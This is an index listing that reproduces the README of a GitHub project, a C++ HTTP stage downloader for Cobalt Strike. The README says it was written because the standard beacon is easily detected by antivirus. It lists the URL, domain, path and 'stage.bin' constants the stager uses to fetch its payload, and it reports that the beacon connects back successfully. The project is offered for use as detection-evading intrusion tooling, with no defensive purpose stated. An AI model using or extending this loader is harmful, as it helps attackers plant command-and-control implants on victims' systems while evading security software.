Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/fgfxf/HttpStageDownloader

cobaltstrike的http分阶段下载器 cpp版本;cobaltstrike stage downloader;
https://github.com/fgfxf/HttpStageDownloader

Last synced: 21 days ago
JSON representation

cobaltstrike的http分阶段下载器 cpp版本;cobaltstrike stage downloader;

Awesome Lists containing this project

README

        

# HttpStageDownloader
cobaltstrike的http分阶段下载器 cpp版本
cobaltstrike stage downloader writed by cpp

参考视频:https://www.bilibili.com/video/BV1MA4y1Z7Uz/

cobalt strike的http beacon很容易被查杀,这里用wininet和winhttp写了个分阶段下载器。
代码里的

const WCHAR* szUrl = L"http://127.0.0.1/async/Newtab_promos";

const WCHAR* szDomain = L"127.0.0.1";

const WCHAR* szUrlPath = L"/async/Newtab_promos";

const char* szFileName = "stage.bin";

自己根据profile文件进行修改.

![](https://github.com/fgfxf/HttpStageDownloader/blob/main/1.png)

![](https://github.com/fgfxf/HttpStageDownloader/blob/main/2.png)

![](https://github.com/fgfxf/HttpStageDownloader/blob/main/3.png)

![](https://github.com/fgfxf/HttpStageDownloader/blob/main/4.png)

![可以正常上线,但是有黑框](https://github.com/fgfxf/HttpStageDownloader/blob/main/5.png)